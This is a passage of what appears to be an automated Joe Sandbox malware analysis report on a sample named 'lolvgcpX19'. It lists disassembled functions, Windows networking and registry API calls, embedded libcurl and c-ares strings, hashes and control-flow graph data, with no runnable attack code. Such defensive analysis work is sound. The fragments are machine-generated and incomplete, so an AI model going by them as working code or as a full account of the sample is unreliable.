                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: ares__sortaddrinfo.c$cur != NULL
                                  • API String ID: 3358416759-2430778319
                                  • Opcode ID: 3482fafdc40ff745f6da6a1658dba8a380ff2c17e25af9869f26842a40dd0675
                                  • Instruction ID: 2375f6aa1c4eab33f3e12d9320b428bdfb732ab8b8a737a546b8b75e6b4e823b
                                  • Opcode Fuzzy Hash: 3482fafdc40ff745f6da6a1658dba8a380ff2c17e25af9869f26842a40dd0675
                                  • Instruction Fuzzy Hash: B7C15DB16043159FD758DF29C8C0A6ABBE1BF88314F05897CE9898B3A1DB35ED45CB81
                                  Function 00F96FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 204b3d0f3f977e4737892a17eaa8374535c17a9027ced49a22c0c2ec0a016221
                                  • Instruction ID: bcfc50e617266ad316aa7c5bdcb73d0c77ba66ece197936646af7f9708b0b6ef
                                  • Opcode Fuzzy Hash: 204b3d0f3f977e4737892a17eaa8374535c17a9027ced49a22c0c2ec0a016221
                                  • Instruction Fuzzy Hash: 8C910531A2D3494BEB35AB2988947BB72D5EFC4334F148B2CE899431E4E7759C40F681
                                  Function 0104A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                  Download Yara Rule
                                  APIs
                                  • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0103712E,?,?,?,00001001,00000000), ref: 0104A90D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: recvfrom
                                  • String ID:
                                  • API String ID: 846543921-0
                                  • Opcode ID: 608855ba1aaaf3c823f2c670f9b97f1d09c826dbf47ff3ca05c95b891aa72150
                                  • Instruction ID: 883c959207a7df9a0245a40114ca53ceff1fc8696901a86b121c32774ab00a29
                                  • Opcode Fuzzy Hash: 608855ba1aaaf3c823f2c670f9b97f1d09c826dbf47ff3ca05c95b891aa72150
                                  • Instruction Fuzzy Hash: 35F06279208308AFD1109F01DC84D6BBBEDEFC9654F05456DF988232118270AE10CA72
                                  Function 0103A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0103AA19
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0103AA4C
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0103AA97
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0103AAE9
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0103AB30
                                  • RegCloseKey.KERNELBASE(?), ref: 0103AB6A
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0103AB82
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0103AC46
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0103AD0A
                                  • RegEnumKeyExA.KERNELBASE ref: 0103AD8D
                                  • RegCloseKey.KERNELBASE(?), ref: 0103ADD9
                                  • RegEnumKeyExA.KERNELBASE ref: 0103AE08
                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0103AE2A
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0103AE54
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0103AF63
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0103AFB2
                                  • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0103B072
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: QueryValue$Open$CloseEnum
                                  • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                  • API String ID: 4217438148-1047472027
                                  • Opcode ID: d9216f72fc8f1c08ae504661bbe92b8568f30fdbb40cdfbbaf4955a0b745a78c
                                  • Instruction ID: 536457ea07d6445856f76f4fd02f1e4bc042b84468cafe257c36980884efb95a
                                  • Opcode Fuzzy Hash: d9216f72fc8f1c08ae504661bbe92b8568f30fdbb40cdfbbaf4955a0b745a78c
                                  • Instruction Fuzzy Hash: D7729EB5604301EBE761DB28CC81B6B7BECAF85704F145828F9C5DB291E771E944CB62
                                  Function 00FBA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                  Download Yara Rule
                                  APIs
                                  • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00FBA831
                                  Strings
                                  • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00FBAD0A
                                  • cf-socket.c, xrefs: 00FBA5CD, 00FBA735
                                  • Trying %s:%d..., xrefs: 00FBA7C2, 00FBA7DE
                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00FBA6CE
                                  • Local Interface %s is ip %s using address family %i, xrefs: 00FBAE60
                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 00FBADAC
                                  • Bind to local port %d failed, trying next, xrefs: 00FBAFE5
                                  • bind failed with errno %d: %s, xrefs: 00FBB080
                                  • @, xrefs: 00FBA8F4
                                  • cf_socket_open() -> %d, fd=%d, xrefs: 00FBA796
                                  • @, xrefs: 00FBAC42
                                  • Couldn't bind to '%s' with errno %d: %s, xrefs: 00FBAE1F
                                  • Could not set TCP_NODELAY: %s, xrefs: 00FBA871
                                  • Trying [%s]:%d..., xrefs: 00FBA689
                                  • Local port: %hu, xrefs: 00FBAF28
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: setsockopt
                                  • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                  • API String ID: 3981526788-2373386790
                                  • Opcode ID: c886ffd98389488059a3ad422e92343e480da3f547b111451834160918ddb26b
                                  • Instruction ID: 90060f4d64dba5a54c45858867fa05f3d7ddf75f7d7dc7fb5b004a585bff72f7
                                  • Opcode Fuzzy Hash: c886ffd98389488059a3ad422e92343e480da3f547b111451834160918ddb26b
                                  • Instruction Fuzzy Hash: 4762F171908381ABE7218F25CC46BEBB7E5BF84314F04492DF98897292E771E845DB93
                                  Function 01049740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 862 1049740-104975b 863 1049780-1049782 862->863 864 104975d-1049768 call 10478a0 862->864 866 1049914-104994e call 1308b70 RegOpenKeyExA 863->866 867 1049788-10497a0 call 1308e00 call 10478a0 863->867 871 104976e-1049770 864->871 872 10499bb-10499c0 864->872 875 1049950-1049955 866->875 876 104995a-1049992 RegQueryValueExA RegCloseKey call 1308b98 866->876 867->872 877 10497a6-10497c5 867->877 871->877 878 1049772-104977e 871->878 879 1049a0c-1049a15 872->879 875->879 890 1049997-10499b5 call 10478a0 876->890 885 1049827-1049833 877->885 886 10497c7-10497e0 877->886 878->867 891 1049835-104985c call 103e2b0 * 2 885->891 892 104985f-1049872 call 1045ca0 885->892 888 10497f6-1049809 886->888 889 10497e2-10497f3 call 1308b50 886->889 888->885 901 104980b-1049810 888->901 889->888 890->872 890->877 891->892 902 10499f0 892->902 903 1049878-104987d call 10477b0 892->903 901->885 907 1049812-1049822 901->907 906 10499f5-10499fb call 1045d00 902->906 911 1049882-1049889 903->911 916 10499fe-1049a09 906->916 907->879 911->906 915 104988f-104989b call 1034fe0 911->915 915->902 921 10498a1-10498c3 call 1308b50 call 10478a0 915->921 916->879 926 10499c2-10499ed call 103e2b0 * 2 921->926 927 10498c9-10498db call 103e2d0 921->927 926->902 927->926 931 10498e1-10498f0 call 103e2d0 927->931 931->926 937 10498f6-1049905 call 10463f0 931->937 942 1049f66-1049f7f call 1045d00 937->942 943 104990b-104990f 937->943 942->916 945 1049a3f-1049a5a call 1046740 call 10463f0 943->945 945->942 951 1049a60-1049a6e call 1046d60 945->951 954 1049a70-1049a94 call 1046200 call 10467e0 call 1046320 951->954 955 1049a1f-1049a39 call 1046840 call 10463f0 951->955 966 1049a16-1049a19 954->966 967 1049a96-1049ac6 call 103d120 954->967 955->942 955->945 966->955 969 1049fc1 966->969 972 1049ae1-1049af7 call 103d190 967->972 973 1049ac8-1049adb call 103d120 967->973 971 1049fc5-1049ffd call 1045d00 call 103e2b0 * 2 969->971 971->916 972->955 980 1049afd-1049b09 call 1034fe0 972->980 973->955 973->972 980->969 987 1049b0f-1049b29 call 103e730 980->987 992 1049f84-1049f88 987->992 993 1049b2f-1049b3a call 10478a0 987->993 994 1049f95-1049f99 992->994 993->992 999 1049b40-1049b54 call 103e760 993->999 996 1049fa0-1049fb6 call 103ebf0 * 2 994->996 997 1049f9b-1049f9e 994->997 1009 1049fb7-1049fbe 996->1009 997->969 997->996 1005 1049f8a-1049f92 999->1005 1006 1049b5a-1049b6e call 103e730 999->1006 1005->994 1012 1049b70-104a004 1006->1012 1013 1049b8c-1049b97 call 10463f0 1006->1013 1009->969 1017 104a015-104a01d 1012->1017 1021 1049b9d-1049bbf call 1046740 call 10463f0 1013->1021 1022 1049c9a-1049cab call 103ea00 1013->1022 1019 104a024-104a045 call 103ebf0 * 2 1017->1019 1020 104a01f-104a022 1017->1020 1019->971 1020->971 1020->1019 1021->1022 1039 1049bc5-1049bda call 1046d60 1021->1039 1030 1049f31-1049f35 1022->1030 1031 1049cb1-1049ccd call 103ea00 call 103e960 1022->1031 1033 1049f37-1049f3a 1030->1033 1034 1049f40-1049f61 call 103ebf0 * 2 1030->1034 1050 1049cfd-1049d0e call 103e960 1031->1050 1051 1049ccf 1031->1051 1033->955 1033->1034 1034->955 1039->1022 1049 1049be0-1049bf4 call 1046200 call 10467e0 1039->1049 1049->1022 1070 1049bfa-1049c0b call 1046320 1049->1070 1059 1049d10 1050->1059 1060 1049d53-1049d55 1050->1060 1054 1049cd1-1049cec call 103e9f0 call 103e4a0 1051->1054 1071 1049d47-1049d51 1054->1071 1072 1049cee-1049cfb call 103e9d0 1054->1072 1065 1049d12-1049d2d call 103e9f0 call 103e4a0 1059->1065 1064 1049e69-1049e8e call 103ea40 call 103e440 1060->1064 1087 1049e94-1049eaa call 103e3c0 1064->1087 1088 1049e90-1049e92 1064->1088 1091 1049d2f-1049d3c call 103e9d0 1065->1091 1092 1049d5a-1049d6f call 103e960 1065->1092 1085 1049b75-1049b86 call 103ea00 1070->1085 1086 1049c11-1049c1c call 1047b70 1070->1086 1076 1049dca-1049ddb call 103e960 1071->1076 1072->1050 1072->1054 1098 1049ddd-1049ddf 1076->1098 1099 1049e2e-1049e36 1076->1099 1085->1013 1109 1049f2d 1085->1109 1086->1013 1103 1049c22-1049c33 call 103e960 1086->1103 1118 1049eb0-1049eb1 1087->1118 1119 104a04a-104a04c 1087->1119 1096 1049eb3-1049ec4 call 103e9c0 1088->1096 1091->1065 1111 1049d3e-1049d42 1091->1111 1114 1049d71-1049d73 1092->1114 1115 1049dc2 1092->1115 1096->955 1121 1049eca-1049ed0 1096->1121 1108 1049e06-1049e21 call 103e9f0 call 103e4a0 1098->1108 1105 1049e3d-1049e5b call 103ebf0 * 2 1099->1105 1106 1049e38-1049e3b 1099->1106 1129 1049c35 1103->1129 1130 1049c66-1049c75 call 10478a0 1103->1130 1116 1049e5e-1049e67 1105->1116 1106->1105 1106->1116 1145 1049de1-1049dee call 103ec80 1108->1145 1146 1049e23-1049e2c call 103eac0 1108->1146 1109->1030 1111->1064 1126 1049d9a-1049db5 call 103e9f0 call 103e4a0 1114->1126 1115->1076 1116->1064 1116->1096 1118->1096 1124 104a057-104a070 call 103ebf0 * 2 1119->1124 1125 104a04e-104a051 1119->1125 1128 1049ee5-1049ef2 call 103e9f0 1121->1128 1124->1009 1125->969 1125->1124 1159 1049d75-1049d82 call 103ec80 1126->1159 1160 1049db7-1049dc0 call 103eac0 1126->1160 1128->955 1153 1049ef8-1049f0e call 103e440 1128->1153 1137 1049c37-1049c51 call 103e9f0 1129->1137 1149 104a011 1130->1149 1150 1049c7b-1049c8f call 103e7c0 1130->1150 1137->1013 1175 1049c57-1049c64 call 103e9d0 1137->1175 1169 1049df1-1049e04 call 103e960 1145->1169 1146->1169 1149->1017 1150->1013 1170 1049c95-104a00e 1150->1170 1173 1049f10-1049f26 call 103e3c0 1153->1173 1174 1049ed2-1049edf call 103e9e0 1153->1174 1180 1049d85-1049d98 call 103e960 1159->1180 1160->1180 1169->1099 1169->1108 1170->1149 1173->1174 1189 1049f28 1173->1189 1174->955 1174->1128 1175->1130 1175->1137 1180->1115 1180->1126 1189->969
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 01049946
                                  • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 01049974
                                  • RegCloseKey.KERNELBASE(?), ref: 0104998B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                  • API String ID: 3677997916-4129964100
                                  • Opcode ID: f2ae22ca7ec805d1572573146f61e59dfd65f72c5217818586f33a3c67f99238
                                  • Instruction ID: b4298473cef717a7f196081c0759e05818669a5a57145baf79c385dca6dd6464
                                  • Opcode Fuzzy Hash: f2ae22ca7ec805d1572573146f61e59dfd65f72c5217818586f33a3c67f99238
                                  • Instruction Fuzzy Hash: D032D8F5900202ABEB51AB24ECC1B5B76D8AF98318F084574FDC997252FB31E925C793
                                  Function 00FB8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1363 fb8b50-fb8b69 1364 fb8b6b-fb8b74 1363->1364 1365 fb8be6 1363->1365 1367 fb8beb-fb8bf2 1364->1367 1368 fb8b76-fb8b8d 1364->1368 1366 fb8be9 1365->1366 1366->1367 1369 fb8b8f-fb8ba7 call f96e40 1368->1369 1370 fb8bf3-fb8bfe call fba550 1368->1370 1377 fb8cd9-fb8d16 SleepEx 1369->1377 1378 fb8bad-fb8baf 1369->1378 1375 fb8de4-fb8def 1370->1375 1376 fb8c04-fb8c08 1370->1376 1381 fb8e8c-fb8e95 1375->1381 1382 fb8df5-fb8e19 call fba150 1375->1382 1379 fb8c0e-fb8c1d 1376->1379 1380 fb8dbd-fb8dc3 1376->1380 1395 fb8d18-fb8d20 1377->1395 1396 fb8d22 1377->1396 1383 fb8ca6-fb8cb0 1378->1383 1384 fb8bb5-fb8bb9 1378->1384 1389 fb8c1f-fb8c34 connect 1379->1389 1390 fb8c35-fb8c48 call fba150 1379->1390 1380->1366 1387 fb8f00-fb8f06 1381->1387 1388 fb8e97-fb8e9c 1381->1388 1419 fb8e1b-fb8e26 1382->1419 1420 fb8e88 1382->1420 1383->1377 1391 fb8cb2-fb8cb8 1383->1391 1384->1367 1385 fb8bbb-fb8bc2 1384->1385 1385->1367 1394 fb8bc4-fb8bcc 1385->1394 1387->1367 1397 fb8edf-fb8eef call f878b0 1388->1397 1398 fb8e9e-fb8eb6 call f92a00 1388->1398 1389->1390 1418 fb8c4d-fb8c4f 1390->1418 1399 fb8cbe-fb8cd4 call fbb180 1391->1399 1400 fb8ddc-fb8dde 1391->1400 1403 fb8bce-fb8bd2 1394->1403 1404 fb8bd4-fb8bda 1394->1404 1406 fb8d26-fb8d39 1395->1406 1396->1406 1422 fb8ef2-fb8efc 1397->1422 1398->1397 1417 fb8eb8-fb8edd call f93410 * 2 1398->1417 1399->1375 1400->1366 1400->1375 1403->1367 1403->1404 1404->1367 1411 fb8bdc-fb8be1 1404->1411 1414 fb8d3b-fb8d3d 1406->1414 1415 fb8d43-fb8d61 call f9d8c0 call fba150 1406->1415 1421 fb8dac-fb8db8 call fc50a0 1411->1421 1414->1400 1414->1415 1442 fb8d66-fb8d74 1415->1442 1417->1422 1425 fb8c8e-fb8c93 1418->1425 1426 fb8c51-fb8c58 1418->1426 1427 fb8e28-fb8e2c 1419->1427 1428 fb8e2e-fb8e85 call f9d090 call fc4fd0 1419->1428 1420->1381 1421->1367 1422->1387 1435 fb8c99-fb8c9f 1425->1435 1436 fb8dc8-fb8dd9 call fbb100 1425->1436 1426->1425 1432 fb8c5a-fb8c62 1426->1432 1427->1420 1427->1428 1428->1420 1438 fb8c6a-fb8c70 1432->1438 1439 fb8c64-fb8c68 1432->1439 1435->1383 1436->1400 1438->1425 1445 fb8c72-fb8c8b call fc50a0 1438->1445 1439->1425 1439->1438 1442->1367 1443 fb8d7a-fb8d81 1442->1443 1443->1367 1448 fb8d87-fb8d8f 1443->1448 1445->1425 1452 fb8d9b-fb8da1 1448->1452 1453 fb8d91-fb8d95 1448->1453 1452->1367 1456 fb8da7 1452->1456 1453->1367 1453->1452 1456->1421
                                  APIs
                                  • connect.WS2_32(?,?,00000001), ref: 00FB8C2F
                                  • SleepEx.KERNELBASE(00000000,00000000), ref: 00FB8CF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: Sleepconnect
